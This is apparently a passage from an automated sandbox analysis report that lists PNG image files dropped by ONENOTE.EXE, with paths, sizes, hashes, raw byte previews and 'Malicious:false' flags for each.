                                                                                                                                                    Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{BA5EE99F-8C9D-4567-997B-6A096E0B9A4E}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{BAAA38D3-4793-4D52-A749-E555EA4468F7}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4847
                                                                                                                                                    Entropy (8bit):7.950192613458318
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                    MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                    SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                    SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                    SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{BB936535-45C5-4061-873D-06D521896D4C}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4181
                                                                                                                                                    Entropy (8bit):7.950380155401321
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                    MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                    SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                    SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                    SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{BBB50089-D536-4269-A715-A9F655C662A3}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):19235
                                                                                                                                                    Entropy (8bit):7.944867159042578
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                    MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                    SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                    SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                    SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{BD7894B7-7C67-4EBC-8E6A-16E3204DE88D}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4190
                                                                                                                                                    Entropy (8bit):7.94161730428269
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                    MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                    SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                    SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                    SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{C37CB9B2-25F8-463E-BA11-6A95481D6BA7}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3879
                                                                                                                                                    Entropy (8bit):7.9281351307465044
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                    MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                    SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                    SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                    SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{C496AB18-8746-4AD0-88B1-133E84254A94}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{C73302CD-A010-499C-86B5-5198E61E8D7F}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):11449
                                                                                                                                                    Entropy (8bit):7.91552812501629
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                    MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                    SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                    SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                    SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{C983F922-2F27-4C14-9DFE-DD35917DC9CC}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):14553
                                                                                                                                                    Entropy (8bit):7.951135681293377
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                    MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                    SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                    SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                    SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{CB2AB54C-A297-41D7-81E1-2757972E07DE}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{CB54C77B-0214-42D5-AB85-3A393DC63EF3}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4190
                                                                                                                                                    Entropy (8bit):7.94161730428269
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                    MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                    SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                    SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                    SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{CBABFDE1-6BBE-43FD-BA47-E39F5076E19C}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):7374
                                                                                                                                                    Entropy (8bit):7.955141875077912
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                    MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                    SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                    SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                    SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                    Malicious:false
